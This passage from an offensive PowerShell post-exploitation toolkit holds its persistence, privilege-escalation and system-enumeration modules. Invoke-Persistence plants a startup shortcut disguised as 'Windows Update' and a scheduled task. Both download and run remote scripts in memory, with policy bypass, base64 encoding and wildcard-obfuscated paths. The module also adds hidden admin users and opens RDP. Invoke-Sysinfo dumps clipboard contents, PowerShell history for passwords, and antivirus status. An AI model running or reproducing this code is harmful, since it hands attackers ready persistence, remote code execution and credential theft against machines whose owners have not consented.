39 | .EXAMPLE 40 | Invoke-Persistence -EnableRdp -RdpUser tjones 41 | 42 | .EXAMPLE 43 | Invoke-Persistence -PsTask -PsUrl http://server/script.ps1 -TaskName "Test" -Time "00:01" 44 | 45 | .EXAMPLE 46 | Invoke-Persistence -PsTask -TaskName "Test" -Clean 47 | 48 | .NOTES 49 | Author: Fabrizio Siciliano (@0rbz_) 50 | 51 | #> 52 | 53 | [CmdletBinding()] 54 | param ( 55 | [Parameter(Position=1)] 56 | [Switch]$Help, 57 | [switch]$List, 58 | 59 | [Parameter(Mandatory = $False)] 60 | [Switch]$StartupLnk, 61 | [String]$PsUrl, 62 | [Switch]$Encoded, 63 | [Switch]$Clean, 64 | 65 | [Parameter(Mandatory = $False)] 66 | [Switch]$AddUser, 67 | [String]$UserName, 68 | [String]$Password, 69 | [Switch]$Admin, 70 | [Switch]$Delete, 71 | 72 | [Parameter(Mandatory = $False)] 73 | [Switch]$EnableRdp, 74 | [String]$RdpUser, 75 | 76 | [Parameter(Mandatory = $False)] 77 | [Switch]$PsTask, 78 | [String]$PsUrl2=[String]$PsUrl, 79 | [String]$TaskName, 80 | [String]$Time, 81 | [Switch]$Clean2=[Switch]$Clean 82 | 83 | ) 84 | 85 | $Rs1 = (-join ((65..90) + (97..122) | Get-Random -Count 5 | foreach {[char]$_})) 86 | 87 | if ($Help -eq $True) { 88 | Write @" 89 | 90 | ### Invoke-Persistence HELP ### 91 | ------------------------------- 92 | Available Invoke-Persistence Commands: 93 | -------------------------------------- 94 | |-----------------------------------------------------------------------------| 95 | | -StartupLnk [-Clean] [-PsUrl] File_url [-Encoded] | 96 | |-----------------------------------------------------------------------------| 97 | 98 | [*] Description: Drops a .LNK file in the current user's startup directory 99 | named "Windows Update" that executes a remotely hosted PowerShell script 100 | in memory (Net.WebClient DownloadString). If the "-Encoded" parameter is 101 | appended to the command line, the downloadstring will be encoded and will 102 | use PowerShell's -EncodedCommand function to execute. 103 | 104 | [*] Usage: Invoke-Persistence -StartupLnk -PsUrl https://yourserver/script.ps1 105 | [*] Usage: Invoke-Persistence -StartupLnk -PsUrl https://yourserver/script.ps1 -Encoded 106 | [*] Usage: Invoke-Persistence -StartupLnk -Clean (Removes startup lnk) 107 | 108 | 109 | [*] Mitre ATT&CK Ref: T1060 (Registry Run Keys / Startup Folder) 110 | 111 | |-----------------------------------------------------------------------------| 112 | | -Adduser [-Username] username [-Password] password [-Admin] [-Delete] | 113 | |-----------------------------------------------------------------------------| 114 | 115 | [*] Description: Adds a local user. If the [-Admin] parameter is specified, 116 | adds an existing user to the local Administrators group. Use the [-Delete] 117 | param to delete a user. (Requires Elevation) 118 | 119 | [*] Usage: Invoke-Persistence -AddUser -UserName user2 -Password "p@a55wrd" 120 | [*] Usage: Invoke-Persistence -AddUser -UserName user2 -Admin 121 | [*] Usage: Invoke-Persistence -Adduser -Username user2 -Delete 122 | 123 | |-----------------------------------------------------------------------------| 124 | | -EnableRdp [-RdpUser] user | 125 | |-----------------------------------------------------------------------------| 126 | 127 | [*] Description: Enables remote desktop on the target, and adds an existing 128 | user to the Remote Desktop users group. (Requires Elevation) 129 | 130 | [*] Usage: Invoke-Persistence -EnableRdp -RdpUser tjones 131 | 132 | |-----------------------------------------------------------------------------| 133 | | -PsTask [-PsUrl] url [-TaskName] Task Name [-Time] "time" | 134 | |-----------------------------------------------------------------------------| 135 | 136 | [*] Description: Generates a scheduled task that utilizes Net.Webclient 137 | Downloadstring method to a remote PowerShell script. 138 | 139 | [*] Usage: Invoke-Persistence -PsTask -PsUrl http://server/script.ps1 -TaskName "Test" -Time "00:01" 140 | Usage: Invoke-Persistence -PsTask -TaskName "Test" -Clean 141 | 142 | \-----------------------------------------------------------------------------/ 143 | 144 | "@ 145 | } 146 | elseif ($List -eq $True) { 147 | Write @" 148 | 149 | Invoke-Persistence Brief Command Usage: 150 | --------------------------------------- 151 | Invoke-Persistence -StartupLnk -PsUrl https://yourserver/script.ps1 152 | Invoke-Persistence -StartupLnk -PsUrl https://yourserver/script.ps1 -Encoded 153 | Invoke-Persistence -AddUser -UserName user2 -Password "p@a55wrd" 154 | Invoke-Persistence -EnableRdp -RdpUser tjones 155 | Invoke-Persistence -PsTask -PsUrl http://server/script.ps1 -TaskName "Test" -Time "00:01" 156 | Invoke-Persistence -PsTask -TaskName "Test" -Clean 157 | 158 | "@ 159 | } 160 | 161 | if ($StartupLnk -and $PsUrl -and $Encoded) { 162 | 163 | $StartUp = "$env:appdata\Microsoft\Windows\Start Menu\Programs\Startup" 164 | 165 | $EncodedCommand = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("IEX (New-Object Net.Webclient).downloadstring('$PsUrl')")) 166 | 167 | $PSExe = "$pshome\powershell.exe" 168 | $Wss = New-Object -ComObject WScript.Shell 169 | $LnkCr = $Wss.CreateShortcut("$StartUp\Windows Update.lnk") 170 | $LnkCr.TargetPath = $PSExe 171 | $LnkCr.Arguments =@" 172 | -ep bypass -nop -EncodedCommand "$EncodedCommand" 173 | "@ 174 | $LnkCr.Description ="Windows Update" 175 | $LnkCr.IconLocation = "shell32.dll,14" 176 | $LnkCr.WorkingDirectory ="C:\Windows\System32" 177 | $LnkCr.Save() 178 | 179 | while ($(Test-Path "$StartUp\Windows Update.lnk")) { 180 | 181 | $h = "`n### Invoke-Persistence(StartupLnk) ###`n" 182 | $Success = @" 183 | 184 | [+] Success! "Windows Update.lnk" Installed: 185 | $Startup\Windows Update.lnk file. 186 | 187 | [+] LNK Target: 188 | $pshome\powershell.exe -ep bypass -nop -EncodedCommand "$EncodedCommand" 189 | 190 | "@ 191 | $h 192 | $Success 193 | $h 194 | return 195 | } 196 | } 197 | $StartUp = "$env:appdata\Microsoft\Windows\Start Menu\Programs\Startup" 198 | if ($StartupLnk -and $Clean -and $(Test-Path "$StartUp\Windows Update.lnk")) { 199 | $h = "`n### Invoke-Persistence(StartupLnk) ###`n" 200 | Remove-Item "$Startup\Windows Update.lnk" 201 | $h 202 | Write "`n [+] Successfully removed $StartUp\Windows Update.lnk`n" 203 | $h 204 | return 205 | } 206 | elseif ($StartupLnk -and $Clean -and !$(Test-Path "$StartUp\Windows Update.lnk")) { 207 | $h = "`n### Invoke-Persistence(StartupLnk) ###`n" 208 | $h 209 | Write "`n [-] $StartUp\Windows_Update.lnk doesn't exist!`n" 210 | $h 211 | return 212 | } 213 | elseif ($StartupLnk -and $PsUrl) { 214 | $StartUp = "$env:appdata\Microsoft\Windows\Start Menu\Programs\Startup" 215 | 216 | $PSExe = "$pshome\powershell.exe" 217 | $Wss = New-Object -ComObject WScript.Shell 218 | $LnkCr = $Wss.CreateShortcut("$StartUp\Windows Update.lnk") 219 | $LnkCr.TargetPath = $PSExe 220 | $LnkCr.Arguments =@" 221 | -ep bypass -nop "IEX (New-Object Net.Webclient).downloadstring('$PsUrl')" 222 | "@ 223 | $LnkCr.Description ="Windows Update" 224 | $LnkCr.IconLocation = "shell32.dll,14" 225 | $LnkCr.WorkingDirectory ="C:\Windows\System32" 226 | $LnkCr.Save() 227 | 228 | while ($(Test-Path "$StartUp\Windows Update.lnk")) { 229 | 230 | $h = "`n### Invoke-Persistence(StartupLnk) ###`n" 231 | $Success = @" 232 | 233 | [+] Success! "Windows Update.lnk" Installed: 234 | $Startup\Windows Update.lnk file. 235 | 236 | [+] LNK Target: 237 | $pshome\powershell.exe -ep bypass -nop "IEX (New-Object Net.Webclient).downloadstring('$PsUrl')" 238 | 239 | "@ 240 | $h 241 | $Success 242 | $h 243 | return 244 | } 245 | } 246 | $StartUp = "$env:appdata\Microsoft\Windows\Start Menu\Programs\Startup" 247 | if ($StartupLnk -and $Clean -and $(Test-Path "$StartUp\Windows Update.lnk")) { 248 | $h = "`n### Invoke-Persistence(StartupLnk) ###`n" 249 | Remove-Item "$Startup\Windows Update.lnk" 250 | $h 251 | Write "`n [+] Successfully removed $StartUp\Windows Update.lnk`n" 252 | $h 253 | return 254 | } 255 | 256 | elseif ($AddUser -and $Username -and $Password) { 257 | 258 | if ($([bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups ` 259 | -match "S-1-5-32-544"))) { 260 | $h = "`n### Invoke-Persistence(AddUser) ###`n" 261 | $h 262 | (net user $Username $Password /add /y) 263 | Write " [+] User `"$username`" added." 264 | $h 265 | } 266 | if (!$([bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups ` 267 | -match "S-1-5-32-544"))) { 268 | $h = "`n### Invoke-Persistence(AddUser) ###`n" 269 | $h 270 | Write " [-] This function requires elevation. Unable to add user `"$Username`"." 271 | $h 272 | return 273 | } 274 | } 275 | elseif ($Adduser -and $Username -and $Admin) { 276 | 277 | if ($([bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups ` 278 | -match "S-1-5-32-544"))) { 279 | 280 | $h = "`n### Invoke-Persistence(AddUser) ###`n" 281 | $h 282 | (net localgroup `"Administrators`" $UserName /add) 283 | Write " [+] User `"$Username`" added to the local Administrators group." 284 | $h 285 | } 286 | if (!$([bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups ` 287 | -match "S-1-5-32-544"))) { 288 | $h = "`n### Invoke-Persistence(AddUser) ###`n" 289 | $h 290 | Write " [-] This function requires elevation. Unable to add `"$username`" to admins group." 291 | $h 292 | return 293 | } 294 | } 295 | elseif ($Adduser -and $Username -and $Delete) { 296 | 297 | if ($([bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups ` 298 | -match "S-1-5-32-544"))) { 299 | $h = "`n### Invoke-Persistence(AddUser) ###`n" 300 | $h 301 | (net user $username /delete) 302 | Write " [+] User `"$username`" deleted." 303 | $h 304 | } 305 | if (!$([bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups ` 306 | -match "S-1-5-32-544"))) { 307 | $h = "`n### Invoke-Persistence(AddUser) ###`n" 308 | $h 309 | Write " [-] This function requires elevation. Unable to delete `"$Username`"." 310 | $h 311 | return 312 | } 313 | } 314 | elseif ($EnableRdp -and $RdpUser) { 315 | if ($([bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups ` 316 | -match "S-1-5-32-544"))) { 317 | Try { 318 | $h = "`n### Invoke-Persistence(EnableRdp) ###`n" 319 | $h 320 | (reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f) 321 | (reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f) 322 | (netsh advfirewall firewall set rule group="remote desktop" new enable=yes) 323 | (net localgroup "Remote Desktop Users" $RdpUser /add) 324 | Write " [+] Successfully enabled Remote Desktop and added $RdpUser to the Remote Desktop users group." 325 | $h 326 | } 327 | Catch { 328 | Write " [!] Unknown Error." 329 | } 330 | } 331 | if (!$([bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups ` 332 | -match "S-1-5-32-544"))) { 333 | $h = "`n### Invoke-Persistence(EnableRdp) ###`n" 334 | $h 335 | Write " [-] This function requires elevation. Unable to enable Remote Desktop." 336 | $h 337 | } 338 | } 339 | if ($PsTask -and $PsUrl -and $TaskName -and $Time) { 340 | Try { 341 | $Wss = New-Object -ComObject WScript.Shell 342 | $LnkCr = $Wss.CreateShortcut("$env:appdata\$Rs1.lnk") 343 | $LnkCr.TargetPath = "C:\Windows\System32\schtasks.exe" 344 | $LnkCr.Arguments = "/Create /F /TN `"$TaskName`" /SC DAILY /ST $Time /TR ""powershell -ep Bypass -nop -w 1 \""iex ((New-Object Net.WebClient).DownloadString(\\\""'$PSUrl\\\""))\""" 345 | $LnkCr.Save() 346 | Start-Process -Wi Hidden -Fi "$env:appdata\$Rs1.lnk" 347 | Remove-Item "$env:appdata\$Rs1.lnk" 348 | Write " [+] Success." 349 | } 350 | Catch { 351 | Write " [!] Unknown Error." 352 | } 353 | } 354 | elseif ($PsTask -and $TaskName -and $Clean) { 355 | (C:\w?*n???s\s*3?\s?ht?s?s.?x? /Delete /TN $TaskName /f) 356 | } 357 | 358 | } 359 | 360 | -------------------------------------------------------------------------------- /modules/Invoke-Privesc.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-Privesc { 2 | <# 3 | 4 | .SYNOPSIS 5 | Commands for either elevating to a higher integrity-level or elevating privileges via other means. 6 | 7 | .PARAMETER Help 8 | Shows Detailed Help. 9 | 10 | .PARAMETER List 11 | Shows Brief Command Help. 12 | 13 | .PARAMETER UnquotedPaths 14 | Checks for auto start services configured without quotes, useful for identifying services vulnerable to unquoted service paths exploitation. 15 | 16 | .EXAMPLE 17 | PS> Invoke-Privesc -UnquotedPaths 18 | 19 | .NOTES 20 | Author: Fabrizio Siciliano (@0rbz_) 21 | 22 | #> 23 | 24 | [CmdletBinding()] 25 | param ( 26 | [Parameter(Position=1)] 27 | [Switch]$Help, 28 | [switch]$List, 29 | 30 | [Parameter(Mandatory = $False)] 31 | [Switch]$UnquotedPaths 32 | ) 33 | 34 | if ($Help -eq $True) { 35 | 36 | Write @" 37 | 38 | ### Invoke-Privesc Help ### 39 | --------------------------- 40 | Available Invoke-Privesc Commands: 41 | ---------------------------------- 42 | |-----------------------------------------------------------------------------| 43 | | -UnquotedPaths | 44 | |-----------------------------------------------------------------------------| 45 | 46 | [?] Checks for auto start services configured without quotes, useful for 47 | identifying services vulnerable to unquoted service paths exploitation. 48 | 49 | [?] Usage: Invoke-Privesc -UnquotedPaths 50 | 51 | \-----------------------------------------------------------------------------/ 52 | 53 | "@ 54 | } 55 | elseif ($List -eq $True) { 56 | Write @" 57 | 58 | Invoke-Privesc Brief Command Usage: 59 | ----------------------------------- 60 | Invoke-Privesc -UnquotedPaths 61 | 62 | "@ 63 | } 64 | elseif ($UnquotedPaths) { 65 | 66 | Get-WmiObject win32_service | select PSConfiguration | Where {$_.PathName -notlike '*svchost*' -and $_.PathName -NotLike '*system32*' -and $_.StartMode -Like "Auto" -and $_.PathName -notmatch '"' -and $_.PathName -match ' '} 67 | 68 | Get-WmiObject win32_service | select PSConfiguration | Where {$_.PathName -notlike '*svchost*' -and $_.PathName -NotLike '*system32*' -and $_.StartMode -Like "Manual" -and $_.PathName -notmatch '"' -and $_.PathName -match ' '} 69 | 70 | Get-WmiObject win32_service | select PSConfiguration | Where {$_.PathName -notlike '*svchost*' -and $_.PathName -NotLike '*system32*' -and $_.StartMode -Like "Disabled" -and $_.PathName -notmatch '"' -and $_.PathName -match ' '} 71 | 72 | 73 | 74 | } 75 | } -------------------------------------------------------------------------------- /modules/Invoke-Sysinfo.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-Sysinfo { 2 | <# 3 | 4 | .SYNOPSIS 5 | Obtains information about the system, its users, software and other functions. 6 | 7 | .PARAMETER Help 8 | Shows Detailed Help. 9 | 10 | .PARAMETER List 11 | Shows Brief Command Help. 12 | 13 | .PARAMETER Os 14 | Retrieves basic operating system information. 15 | 16 | .PARAMETER Env 17 | Retrieves environment variable information. 18 | 19 | .PARAMETER Arch 20 | Retrieves system architecture. 21 | 22 | .PARAMETER Drives 23 | Retrieves any drives on the system. 24 | 25 | .PARAMETER Users 26 | Retrieves a list of local users. 27 | 28 | .PARAMETER LocalAdmins 29 | Retrieves a list of local administrators. 30 | 31 | .PARAMETER DomainAdmins 32 | If connected to an Active Directory domain, will retrieve a list of Domain Administrators. 33 | 34 | .PARAMETER Privs 35 | Displays the current users' privileges. 36 | 37 | .PARAMETER HotFixes 38 | Retrieves a list of hotfixes installed on the system. 39 | 40 | .PARAMETER CheckElevated 41 | Checks if current users' PowerShell process is elevated. 42 | 43 | .PARAMETER Shares 44 | Displays Shares 45 | 46 | .PARAMETER LoggedOn 47 | 48 | Displays current interactively logged-on users. 49 | 50 | .PARAMETER Apps 51 | 52 | Displays all installed applications. 53 | 54 | .PARAMETER Procs 55 | 56 | Displays running processes. 57 | 58 | .PARAMETER Services 59 | 60 | Displays services. 61 | 62 | .PARAMETER Tasks 63 | Displays scheduled tasks. 64 | 65 | .PARAMETER Av 66 | 67 | Displays currently installed Antivirus software. 68 | 69 | .PARAMETER LangMode 70 | Checks current PowerShell language mode. 71 | 72 | .PARAMETER PsVersion 73 | Checks PowerShell version for the current session. 74 | 75 | .PARAMETER DnsCache 76 | Dumps local client DNS Cache. 77 | 78 | .PARAMETER PsHistory 79 | Obtains the PowerShell history from the ConsoleHost_history.txt file. 80 | 81 | .PARAMETER ClipBoard 82 | Dumps current clipboard contents. 83 | 84 | .PARAMETER RecentDocs 85 | Dumps recently accessed documents. 86 | 87 | .PARAMETER IpConfig 88 | Displays network interfaces information. 89 | 90 | .PARAMETER NetStat 91 | Displays all active network connections. 92 | 93 | .PARAMETER IEFavorites 94 | Dumps Internet Explorer Favorites / URLS 95 | 96 | .PARAMETER DumpAll 97 | Dumps all of the above modules into a sysinfo.txt file. 98 | 99 | .EXAMPLE 100 | PS> Invoke-Sysinfo -Av 101 | 102 | .EXAMPLE 103 | PS> Invoke-Sysinfo -PsHistory | Select-String "password" 104 | 105 | .EXAMPLE 106 | PS> Invoke-Sysinfo -Os | Out-File C:\temp\os.txt 107 | 108 | .NOTES 109 | Author: Fabrizio Siciliano (@0rbz_) 110 | 111 | #> 112 | 113 | [CmdletBinding()] 114 | param ( 115 | [Switch]$Help, 116 | [Switch]$List, 117 | [Switch]$Os, 118 | [Switch]$Env, 119 | [Switch]$Arch, 120 | [Switch]$Drives, 121 | [Switch]$Users, 122 | [Switch]$LocalAdmins, 123 | [Switch]$DomainAdmins, 124 | [Switch]$Privs, 125 | [Switch]$Hotfixes, 126 | [Switch]$CheckElevated, 127 | [Switch]$Shares, 128 | [Switch]$LoggedOn, 129 | [Switch]$Apps, 130 | [Switch]$Procs, 131 | [Switch]$Services, 132 | [Switch]$Tasks, 133 | [Switch]$Av, 134 | [Switch]$LangMode, 135 | [Switch]$PsVersion, 136 | [Switch]$DnsCache, 137 | [Switch]$PsHistory, 138 | [Switch]$ClipBoard, 139 | [Switch]$RecentDocs, 140 | [Switch]$IpConfig, 141 | [Switch]$NetStat, 142 | [Switch]$IEFavorites, 143 | [Switch]$DumpAll 144 | ) 145 | 146 | if ($Help -eq $true -or $List -eq $True) { 147 | 148 | Write @" 149 | 150 | ### Invoke-Sysinfo Help ### 151 | --------------------------- 152 | 153 | Invoke-Sysinfo [-command] 154 | 155 | Example: Invoke-Sysinfo -Os 156 | Example: Invoke-Sysinfo -Os | Out-File C:\temp\os.txt 157 | Example: Invoke-Sysinfo -Env 158 | Example: Invoke-Sysinfo -LangMode 159 | Example: Invoke-Sysinfo -PsHistory |Select-String "password" 160 | 161 | SYSINFO Command List: 162 | --------------------- 163 | |---------------------------------------------------------------------| 164 | 165 | -Os (Displays Basic Operating System Information) 166 | -Env (Displays Environment Variables Information) 167 | -Arch (Displays system architecture) 168 | -Drives (Displays current drives) 169 | -Users (Displays Users) 170 | -LocalAdmins (Displays local admins) 171 | -DomainAdmins (Displays Domain Admins) 172 | -Privs (Displays current user privileges) 173 | -HotFixes (Displays installed hotfixes) 174 | -CheckElevated (Checks if current user PS process is elevated) 175 | -Shares (Displays shared drives on the system) 176 | -LoggedOn (Displays currently interactively logged-on users) 177 | -Apps (Retrieves installed applications) 178 | -Procs (Displays current running processes) 179 | -Services (Displays current running and stopped services) 180 | -Tasks (Displays non-Microsoft scheduled tasks) 181 | -Av (Retrieves installed AntiVirus software information) 182 | -LangMode (Checks powershell current language mode) 183 | -PsVersion (Displays PowerShell version) 184 | -DnsCache (Dumps DNS Cache) 185 | -PsHistory (Dumps PowerShell Commandline History) 186 | -ClipBoard (Dumps Clipboard Contents) 187 | -RecentDocs (Dumps recently accessed files) 188 | -IpConfig (Dumps Network Interface Information) 189 | -NetStat (Dumps Active Network Connection information) 190 | -IEFavorites (Dumps Internet Explorer Favorites/Bookmarks) 191 | -DumpAll (Dumps all of the above modules information into 192 | %appdata%\sysinfo.txt) 193 | 194 | \---------------------------------------------------------------------/ 195 | 196 | "@ 197 | } 198 | 199 | elseif ($Os) { 200 | $h = "`n### Invoke-Sysinfo(Os) ###`n" 201 | $h 202 | get-wmiobject win32_operatingsystem | Select-Object Caption, Version, OSArchitecture, ServicePackMajorVersion, ServicePackMinorVersion, MUILanguages, LastBootUpTime, LocalDateTime, NumberOfUsers, SystemDirectory 203 | $h 204 | } 205 | elseif ($Env) { 206 | $h = "`n### Invoke-Sysinfo(Env) ###`n" 207 | $h 208 | Get-ChildItem Env: | ft Key,Value 209 | $h 210 | } 211 | elseif ($Arch) { 212 | if ($(Get-WmiObject -Query "SELECT * FROM Win32_Processor WHERE AddressWidth='64'")) { 213 | Write "`n [+] x64 Architecture detected.`n" 214 | } 215 | else { 216 | Write "`n [+] Likely x86.`n" 217 | } 218 | } 219 | elseif ($Drives) { 220 | $h = "`n### Invoke-Sysinfo(Drives) ###`n" 221 | $h 222 | Get-PSDrive | where {$_.Provider -like 'Microsoft.PowerShell.Core\FileSystem'} | ft Name,Root 223 | $h 224 | } 225 | elseif ($Users) { 226 | $h = "`n### Invoke-Sysinfo(Users) ###`n" 227 | $h 228 | Get-WmiObject -Class Win32_UserAccount -Filter "LocalAccount='True'" | select name, fullname 229 | $h 230 | } 231 | elseif ($LocalAdmins) { 232 | $h = "`n### Invoke-Sysinfo(LocalAdmins) ###`n" 233 | $h 234 | (get-wmiobject win32_group -filter "name='Administrators'").GetRelated("win32_useraccount") 235 | $h 236 | } 237 | 238 | elseif ($DomainAdmins) { 239 | $h = "`n### Invoke-Sysinfo(DomainAdmins) ###`n" 240 | $h 241 | (C:\??*?\*3?\n?t.?x? group "Domain Admins" /domain) 242 | $h 243 | } 244 | 245 | elseif ($Privs) { 246 | $h = "`n### Invoke-Sysinfo(Privs) ###`n" 247 | $h 248 | (C:\??*?\*3?\wh??m?.?x? /priv) 249 | $h 250 | } 251 | 252 | elseif ($HotFixes) { 253 | $h = "`n### Invoke-Sysinfo(HotFixes) ###`n" 254 | $h 255 | (Get-Hotfix | Sort-Object -Descending) 256 | $h 257 | } 258 | 259 | elseif ($CheckElevated) { 260 | $h = "`n### Invoke-Sysinfo(CheckElevated) ###`n" 261 | $check = [bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544") 262 | if ($check -eq $true) { 263 | $h 264 | Write " [+] We're running as an elevated process." 265 | $h 266 | } 267 | if ($check -eq $false) { 268 | $h 269 | Write " [-] Not Elevated." 270 | $h 271 | } 272 | } 273 | 274 | elseif ($Shares) { 275 | $h = "`n### Invoke-Sysinfo(Shares) ###`n" 276 | $h 277 | Get-WmiObject Win32_Share 278 | $h 279 | } 280 | 281 | elseif ($LoggedOn) { 282 | # https://social.technet.microsoft.com/Forums/forefront/en-US/6bf4194e-36d4-4fd1-96d6-40ebb9498424/powershell-script-list-all-remote-users-connected-via-rdp-with-details-like-remote-workstation 283 | $h = "`n### Invoke-Sysinfo(LoggedOn) ###`n" 284 | $Explorer = (Get-WmiObject -Query "select * from Win32_Process where Name='explorer.exe'") 285 | 286 | if (!$Explorer) { 287 | $h 288 | Write " [-] No users currently interactively logged on." 289 | $h 290 | } 291 | else { 292 | foreach ($p in $Explorer) { 293 | $Username = $p.GetOwner().User 294 | $Domain = $p.GetOwner().Domain 295 | $h 296 | Write " User: $Domain\$Username`n Logon Time: $($p.ConvertToDateTime($p.CreationDate))" 297 | $h 298 | } 299 | } 300 | } 301 | 302 | elseif ($Apps) { 303 | $h = "`n### Invoke-Sysinfo(Apps) ###`n" 304 | $h 305 | Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | Format-Table Parent,Name,LastWriteTime 306 | $h 307 | } 308 | 309 | elseif ($Procs) { 310 | $h = "`n### Invoke-Sysinfo(Procs) ###`n" 311 | $h 312 | Get-WmiObject -Query 'Select * from Win32_Process' | where {$_.Name -notlike 'svchost*'} | Select Name, Handle, @{Label='Owner';Expression={$_.GetOwner().User}} | Format-Table -AutoSize 313 | $h 314 | } 315 | 316 | elseif ($Services) { 317 | $h = "`n### Invoke-Sysinfo(Services) ###`n" 318 | $h 319 | Get-WmiObject win32_service | Select-Object Name, DisplayName, @{Name="Path"; Expression={$_.PathName.split('"')[1]}}, State | Format-List 320 | $h 321 | } 322 | 323 | elseif ($Tasks) { 324 | $h = "`n### Invoke-Sysinfo(Tasks) ###`n" 325 | $h 326 | (Get-ChildItem C:\windows\system32\tasks |fl -Property Name,FullName) 327 | $h 328 | } 329 | 330 | elseif ($Av) { 331 | # https://stackoverflow.com/questions/33649043/powershell-how-to-get-antivirus-product-details#37842942 332 | [parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] 333 | [Alias('name')] 334 | $computername=$env:computername 335 | $AntiVirusProducts = Get-WmiObject -Namespace "root\SecurityCenter2" -Class AntiVirusProduct -ComputerName $computername 336 | 337 | $ret = @() 338 | foreach($AntiVirusProduct in $AntiVirusProducts){ 339 | switch ($AntiVirusProduct.productState) { 340 | "262144" {$defstatus = "Up to date" ;$rtstatus = "Disabled"} 341 | "262160" {$defstatus = "Out of date" ;$rtstatus = "Disabled"} 342 | "266240" {$defstatus = "Up to date" ;$rtstatus = "Enabled"} 343 | "266256" {$defstatus = "Out of date" ;$rtstatus = "Enabled"} 344 | "393216" {$defstatus = "Up to date" ;$rtstatus = "Disabled"} 345 | "393232" {$defstatus = "Out of date" ;$rtstatus = "Disabled"} 346 | "393488" {$defstatus = "Out of date" ;$rtstatus = "Disabled"} 347 | "397312" {$defstatus = "Up to date" ;$rtstatus = "Enabled"} 348 | "397328" {$defstatus = "Out of date" ;$rtstatus = "Enabled"} 349 | "397584" {$defstatus = "Out of date" ;$rtstatus = "Enabled"} 350 | default {$defstatus = "Unknown" ;$rtstatus = "Unknown"} 351 | } 352 | #Create hash-table for each computer 353 | $ht = @{} 354 | $ht.Computername = $computername 355 | $ht.Name = $AntiVirusProduct.displayName 356 | $ht.'Product GUID' = $AntiVirusProduct.instanceGuid 357 | $ht.'Product Executable' = $AntiVirusProduct.pathToSignedProductExe 358 | $ht.'Reporting Exe' = $AntiVirusProduct.pathToSignedReportingExe 359 | $ht.'Definition Status' = $defstatus 360 | $ht.'Real-time Protection Status' = $rtstatus 361 | 362 | #Create a new object for each computer 363 | $ret += New-Object -TypeName PSObject -Property $ht 364 | } 365 | Write "`n### Invoke-Sysinfo(Av) ###" 366 | Return $ret 367 | } 368 | 369 | elseif ($LangMode) { 370 | $h = "`n### Invoke-Sysinfo(LangMode) ###`n" 371 | $h 372 | $ExecutionContext.SessionState.LanguageMode 373 | $h 374 | } 375 | 376 | elseif ($PsVersion) { 377 | $h = "`n### Invoke-Sysinfo(PsVersion) ###`n" 378 | $h 379 | Write $psversiontable 380 | $h 381 | } 382 | 383 | elseif ($DnsCache) { 384 | $h = "`n### Invoke-Sysinfo(DnsCache) ###`n" 385 | if ($PSVersionTable.PSVersion.Major -eq "2") { 386 | $h 387 | Write " [!] This function requires PowerShell version greater than 2.0." 388 | $h 389 | return 390 | } 391 | else { 392 | $h 393 | Get-DnsClientCache 394 | $h 395 | } 396 | } 397 | elseif ($PsHistory) { 398 | # https://twitter.com/mattifestation/status/740242366754226176 399 | $h = "`n### Invoke-Sysinfo(PsHistory) ###`n" 400 | $h 401 | (Get-Content "$env:appdata\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt") 402 | $h 403 | } 404 | elseif ($ClipBoard) { 405 | $h = "`n### Invoke-Sysinfo(ClipBoard) ###`n" 406 | $h 407 | Get-ClipBoard -Raw 408 | $h 409 | } 410 | elseif ($RecentDocs) { 411 | 412 | (Get-ChildItem $env:appdata\Microsoft\Windows\Recent\) 413 | 414 | } 415 | elseif ($IpConfig) { 416 | (ipconfig /all) 417 | } 418 | elseif ($NetStat) { 419 | (netstat -an) 420 | } 421 | elseif ($IEFavorites) { 422 | 423 | $Favorites = [Environment]::GetFolderPath('Favorites') 424 | $UrlFiles = (Get-ChildItem -Recurse -File $Favorites).FullName 425 | $h = "`n### Invoke-Sysinfo(IEFavorites) ###`n" 426 | $h 427 | foreach ($Url in $UrlFiles) { 428 | $Urlx = Get-Content $Url | Select-String -Pattern "URL" 429 | $Urlx -replace "URL=" 430 | } 431 | Write-Output "`n" 432 | } 433 | elseif ($DumpAll) { 434 | $h = "`n### Invoke-Sysinfo(DumpAll) ###`n" 435 | $h 436 | (Invoke-Sysinfo -Os | out-file $env:temp\sysinfo.txt -Append) 437 | (Invoke-Sysinfo -Env | out-file $env:temp\sysinfo.txt -Append) 438 | (Invoke-Sysinfo -Arch | out-file $env:temp\sysinfo.txt -Append) 439 | (Invoke-Sysinfo -Drives | out-file $env:temp\sysinfo.txt -Append) 440 | (Invoke-Sysinfo -Users | out-file $env:temp\sysinfo.txt -Append) 441 | (Invoke-Sysinfo -LocalAdmins | out-file $env:temp\sysinfo.txt -Append) 442 | (Invoke-Sysinfo -DomainAdmins | out-file $env:temp\sysinfo.txt -Append) 443 | (Invoke-Sysinfo -Privs | out-file $env:temp\sysinfo.txt -Append) 444 | (Invoke-Sysinfo -HotFixes | out-file $env:temp\sysinfo.txt -Append) 445 | (Invoke-Sysinfo -CheckElevated | out-file $env:temp\sysinfo.txt -Append) 446 | (Invoke-Sysinfo -Shares | out-file $env:temp\sysinfo.txt -Append) 447 | (Invoke-Sysinfo -LoggedOn | out-file $env:temp\sysinfo.txt -Append) 448 | (Invoke-Sysinfo -Apps | out-file $env:temp\sysinfo.txt -Append) 449 | (Invoke-Sysinfo -Procs | out-file $env:temp\sysinfo.txt -Append) 450 | (Invoke-Sysinfo -Services | out-file $env:temp\sysinfo.txt -Append) 451 | (Invoke-Sysinfo -Tasks | out-file $env:temp\sysinfo.txt -Append) 452 | (Invoke-Sysinfo -Av | 